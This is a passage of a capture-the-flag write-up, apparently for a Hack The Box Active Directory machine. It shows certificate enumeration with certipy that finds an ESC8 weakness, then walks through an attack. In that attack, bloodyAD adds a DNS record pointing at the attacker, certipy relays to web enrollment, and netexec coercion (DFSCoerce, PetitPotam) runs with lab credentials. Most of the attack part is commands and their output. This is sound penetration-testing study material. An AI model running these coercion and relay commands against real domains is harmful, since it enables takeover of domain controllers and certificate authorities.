-rw-rw-rw- 924 Wed Jun 4 08:04:01 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(26).crt
-rw-rw-rw- 1391 Thu Jul 3 10:24:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(26-25).crt
-rw-rw-rw- 1391 Thu Jul 3 10:24:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(26-27).crt
-rw-rw-rw- 924 Wed Jun 4 08:05:56 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(27).crt
-rw-rw-rw- 1391 Thu Jul 3 10:24:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(27-26).crt
-rw-rw-rw- 1391 Thu Jul 3 10:24:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(27-28).crt
-rw-rw-rw- 924 Wed Jun 4 08:07:56 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(28).crt
-rw-rw-rw- 1391 Thu Jul 3 10:24:27 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(28-27).crt
-rw-rw-rw- 924 Thu Jul 3 10:25:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(29).crt
-rw-rw-rw- 924 Sun Sep 15 07:21:57 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(3).crt
-rw-rw-rw- 1390 Sun Sep 29 03:41:29 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(3-2).crt
-rw-rw-rw- 1390 Sun Sep 29 03:41:29 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(3-4).crt
-rw-rw-rw- 924 Thu Jul 3 10:27:37 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(30).crt
-rw-rw-rw- 924 Thu Jul 3 10:29:36 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(31).crt
-rw-rw-rw- 924 Sun Sep 15 07:24:12 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(4).crt
-rw-rw-rw- 1390 Sun Sep 29 03:41:30 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(4-3).crt
-rw-rw-rw- 1390 Thu Apr 10 02:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(4-5).crt
-rw-rw-rw- 924 Sun Sep 29 03:43:51 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(5).crt
-rw-rw-rw- 1390 Thu Apr 10 02:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(5-4).crt
-rw-rw-rw- 1390 Thu Apr 10 02:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(5-6).crt
-rw-rw-rw- 924 Sun Sep 29 03:44:59 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(6).crt
-rw-rw-rw- 1390 Thu Apr 10 02:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(6-5).crt
-rw-rw-rw- 1390 Thu Apr 10 02:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(6-7).crt
-rw-rw-rw- 924 Sun Sep 29 03:46:59 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(7).crt
-rw-rw-rw- 1390 Thu Apr 10 02:36:39 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(7-6).crt
-rw-rw-rw- 1390 Thu Apr 10 02:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(7-8).crt
-rw-rw-rw- 924 Thu Apr 10 02:40:45 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(8).crt
-rw-rw-rw- 1390 Thu Apr 10 02:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(8-7).crt
-rw-rw-rw- 1390 Thu Apr 10 02:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(8-9).crt
-rw-rw-rw- 924 Thu Apr 10 02:42:44 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(9).crt
-rw-rw-rw- 1390 Thu Apr 10 02:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(9-10).crt
-rw-rw-rw- 1390 Thu Apr 10 02:56:48 2025 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(9-8).crt
-rw-rw-rw- 885 Fri Sep 13 04:50:51 2024 DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA.crt
-rw-rw-rw- 331 Fri Sep 13 09:17:59 2024 nsrev_cicada-DC-JPQ225-CA.asp
Getting the most recent certificate:
> get DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA(31).crt
└──╼ $openssl x509 -in DC-JPQ225.cicada.vl_cicada-DC-JPQ225-CA\(31\).crt -text -noout
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
16:23:75:bb:bb:4c:e5:b0:48:87:bc:bb:c0:87:dd:d1
Signature Algorithm: sha256WithRSAEncryption
Issuer: DC = vl, DC = cicada, CN = cicada-DC-JPQ225-CA
Validity
Not Before: Jul 3 16:19:28 2025 GMT
Not After : Jul 3 16:29:28 2525 GMT
Subject: DC = vl, DC = cicada, CN = cicada-DC-JPQ225-CA
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage:
Digital Signature, Certificate Sign, CRL Sign
X509v3 Basic Constraints: critical
CA:TRUE
X509v3 Subject Key Identifier:
A2:FD:0C:95:BF:13:0D:99:D3:B5:0B:D2:B4:F5:90:71:C6:E9:9C:91
1.3.6.1.4.1.311.21.1:
.....
1.3.6.1.4.1.311.21.2:
..\.,. ...[....."t*~.z
Signature Algorithm: sha256WithRSAEncryption
Signature Value:
Not seeing anything clearly helpful here.
Given the clear focus on certificates here, let’s see if certipy can find any vulnerable certificate templates or CA configuration.
└──╼ $certipy find -k -no-pass -target DC-JPQ225.cicada.vl -dc-ip 10.129.29.26 -ns 10.129.29.26 -enabled
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'cicada-DC-JPQ225-CA' via CSRA
[!] Got error while trying to get CA configuration for 'cicada-DC-JPQ225-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'cicada-DC-JPQ225-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'cicada-DC-JPQ225-CA'
[*] Saved BloodHound data to '20250703135136_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20250703135136_Certipy.txt'
[*] Saved JSON output to '20250703135136_Certipy.json'
(htb) ┌─[chasepd@THE-HACKINATOR]─[~/htb/vulncicada]
└──╼ $cat 20250703135136_Certipy.json
{
"Certificate Authorities": {
"0": {
"CA Name": "cicada-DC-JPQ225-CA",
"DNS Name": "DC-JPQ225.cicada.vl",
"Certificate Subject": "CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl",
"Certificate Serial Number": "162375BBBB4CE5B04887BCBBC087DDD1",
"Certificate Validity Start": "2025-07-03 16:19:28+00:00",
"Certificate Validity End": "2525-07-03 16:29:28+00:00",
"Web Enrollment": "Enabled",
"User Specified SAN": "Disabled",
"Request Disposition": "Issue",
"Enforce Encryption for Requests": "Enabled",
"Permissions": {
"Owner": "CICADA.VL\\Administrators",
"Access Rights": {
"2": [
"CICADA.VL\\Administrators",
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"1": [
"CICADA.VL\\Administrators",
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"512": [
"CICADA.VL\\Authenticated Users"
]
}
},
"[!] Vulnerabilities": {
"ESC8": "Web Enrollment is enabled and Request Disposition is set to Issue"
}
}
},
"Certificate Templates": {
"0": {
"Template Name": "KerberosAuthentication",
"Display Name": "Kerberos Authentication",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectAltRequireDns",
"SubjectAltRequireDomainDns"
],
"Enrollment Flag": [
"AutoEnrollment"
],
"Private Key Flag": [
"AttestNone"
],
"Extended Key Usage": [
"Client Authentication",
"Server Authentication",
"Smart Card Logon",
"KDC Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Enterprise Read-only Domain Controllers",
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Domain Controllers",
"CICADA.VL\\Enterprise Admins",
"CICADA.VL\\Enterprise Domain Controllers"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"1": {
"Template Name": "DirectoryEmailReplication",
"Display Name": "Directory Email Replication",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": false,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectAltRequireDns",
"SubjectAltRequireDirectoryGuid"
],
"Enrollment Flag": [
"AutoEnrollment",
"PublishToDs",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"AttestNone"
],
"Extended Key Usage": [
"Directory Service Email Replication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Enterprise Read-only Domain Controllers",
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Domain Controllers",
"CICADA.VL\\Enterprise Admins",
"CICADA.VL\\Enterprise Domain Controllers"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"2": {
"Template Name": "DomainControllerAuthentication",
"Display Name": "Domain Controller Authentication",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectAltRequireDns"
],
"Enrollment Flag": [
"AutoEnrollment"
],
"Private Key Flag": [
"AttestNone"
],
"Extended Key Usage": [
"Client Authentication",
"Server Authentication",
"Smart Card Logon"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Enterprise Read-only Domain Controllers",
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Domain Controllers",
"CICADA.VL\\Enterprise Admins",
"CICADA.VL\\Enterprise Domain Controllers"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"3": {
"Template Name": "SubCA",
"Display Name": "Subordinate Certification Authority",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": true,
"Any Purpose": true,
"Enrollee Supplies Subject": true,
"Certificate Name Flag": [
"EnrolleeSuppliesSubject"
],
"Enrollment Flag": [
"None"
],
"Private Key Flag": [
"ExportableKey"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "5 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"4": {
"Template Name": "WebServer",
"Display Name": "Web Server",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": false,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": true,
"Certificate Name Flag": [
"EnrolleeSuppliesSubject"
],
"Enrollment Flag": [
"None"
],
"Private Key Flag": [
"AttestNone"
],
"Extended Key Usage": [
"Server Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "2 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"5": {
"Template Name": "DomainController",
"Display Name": "Domain Controller",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDnsAsCn",
"SubjectAltRequireDns",
"SubjectAltRequireDirectoryGuid"
],
"Enrollment Flag": [
"AutoEnrollment",
"PublishToDs",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"AttestNone"
],
"Extended Key Usage": [
"Client Authentication",
"Server Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Enterprise Read-only Domain Controllers",
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Domain Controllers",
"CICADA.VL\\Enterprise Admins",
"CICADA.VL\\Enterprise Domain Controllers"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"6": {
"Template Name": "Machine",
"Display Name": "Computer",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDnsAsCn",
"SubjectAltRequireDns"
],
"Enrollment Flag": [
"AutoEnrollment"
],
"Private Key Flag": [
"AttestNone"
],
"Extended Key Usage": [
"Client Authentication",
"Server Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Domain Computers",
"CICADA.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"7": {
"Template Name": "EFSRecovery",
"Display Name": "EFS Recovery Agent",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": false,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDirectoryPath",
"SubjectAltRequireUpn"
],
"Enrollment Flag": [
"AutoEnrollment",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"ExportableKey"
],
"Extended Key Usage": [
"File Recovery"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "5 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"8": {
"Template Name": "Administrator",
"Display Name": "Administrator",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDirectoryPath",
"SubjectRequireEmail",
"SubjectAltRequireEmail",
"SubjectAltRequireUpn"
],
"Enrollment Flag": [
"AutoEnrollment",
"PublishToDs",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"ExportableKey"
],
"Extended Key Usage": [
"Microsoft Trust List Signing",
"Encrypting File System",
"Secure Email",
"Client Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"9": {
"Template Name": "EFS",
"Display Name": "Basic EFS",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": false,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDirectoryPath",
"SubjectAltRequireUpn"
],
"Enrollment Flag": [
"AutoEnrollment",
"PublishToDs",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"ExportableKey"
],
"Extended Key Usage": [
"Encrypting File System"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Domain Users",
"CICADA.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
},
"10": {
"Template Name": "User",
"Display Name": "User",
"Certificate Authorities": [
"cicada-DC-JPQ225-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": false,
"Certificate Name Flag": [
"SubjectRequireDirectoryPath",
"SubjectRequireEmail",
"SubjectAltRequireEmail",
"SubjectAltRequireUpn"
],
"Enrollment Flag": [
"AutoEnrollment",
"PublishToDs",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"ExportableKey"
],
"Extended Key Usage": [
"Encrypting File System",
"Secure Email",
"Client Authentication"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "1 year",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Domain Users",
"CICADA.VL\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "CICADA.VL\\Enterprise Admins",
"Write Owner Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Dacl Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
],
"Write Property Principals": [
"CICADA.VL\\Domain Admins",
"CICADA.VL\\Enterprise Admins"
]
}
}
}
}
}
This is an ESC8 vulnerability! Web Enrollment is enabled, Request Disposition is set to Issue (i.e. the CA issues certificates automatically without requiring approval), any authenticated user can enroll against the CA (glances at Rosie.Powell), and there are no certificate template restrictions.
ESC8 Pwnage for User…and Root
Searching for this vulnerability turns up that this kind of authentication reflection (relaying the DC’s own authentication back to a service on the DC) is only supposed to be possible from one machine to another, except with Kerberos. In fact, a group named CICADA8-Research automates this exploit here: https://github.com/CICADA8-Research/RemoteKrbRelay. Given the box name, this seems like we’re probably on the right track.
However, running this from Windows is a pain, so luckily there also appears to be krbrelayx, which is meant for doing the attack from another angle and from Linux only. Looking at what it does, we can accomplish roughly the same thing with bloodyAD, certipy, and netexec.
We’ll use bloodyAD to add a DNS record in the domain that points at our IP address (10.10.14.245 is my attacker IP here):
python bloodyAD.py -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ225PIZZAMCCHICKEN 10.10.14.245
[+] DC-JPQ225PIZZAMCCHICKEN has been successfully added
Then we’ll start our relay server that we’ll work on getting ADCS to authenticate to:
certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
Then we’ll use netexec to attempt to coerce it into authenticating with our server. First we should see what methods netexec thinks will work:
netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Creating missing folder logs/sam
[*] Creating missing folder logs/lsa
[*] Creating missing folder logs/ntds
[*] Creating missing folder logs/dpapi
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing FTP protocol database
[*] Initializing WINRM protocol database
[*] Initializing MSSQL protocol database
[*] Initializing NFS protocol database
[*] Initializing VNC protocol database
[*] Initializing WMI protocol database
[*] Initializing SSH protocol database
[*] Initializing SMB protocol database
[*] Initializing LDAP protocol database
[*] Copying default configuration file
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, DFSCoerce
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PetitPotam
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, MSEven
Let’s start with the first one and see how it goes.
netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ225PIZZAMCCHICKEN METHOD=DFSCoerce
The exploit appears to succeed:
netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ225PIZZAMCCHICKEN METHOD=DFSCoerce
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, DFSCoerce
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, netdfs\NetrDfsRemoveRootTarget
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, netdfs\NetrDfsAddStdRoot
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, netdfs\NetrDfsRemoveStdRoot
And we can see the connections to our certipy relay which appear to be finishing the exploit:
[*] SMBD-Thread-2 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-3 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-6 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-8 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-9 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
This takes a while, so it’s time to wait and see if we succeed. If we do, we should eventually get a .pfx file from certipy.
After waiting 5-10 minutes, there was no .pfx file, so I decided to move onto the next coercion method:
netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus -o LISTENER=DC-JPQ225PIZZAMCCHICKEN METHOD=PetitPotam
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:False) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\Rosie.Powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PetitPotam
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, lsarpc\EfsRpcAddUsersToFile
We get more connections on our certipy relay (I restarted it just in case):
certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Targeting http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
[*] Setting up SMB Server on port 445
[*] SMBD-Thread-2 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
[*] SMBD-Thread-3 (process_request_thread): Received connection from 10.129.234.48, attacking target http://dc-jpq225.cicada.vl
My experience was that this vulnerability was VERY flaky to exploit and took a long time, much longer than it seems like it should.
Eventually, after a number of tries using different coerce methods, I got this:
[-] Unsupported MechType 'MS KRB5 - Microsoft Kerberos 5'
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
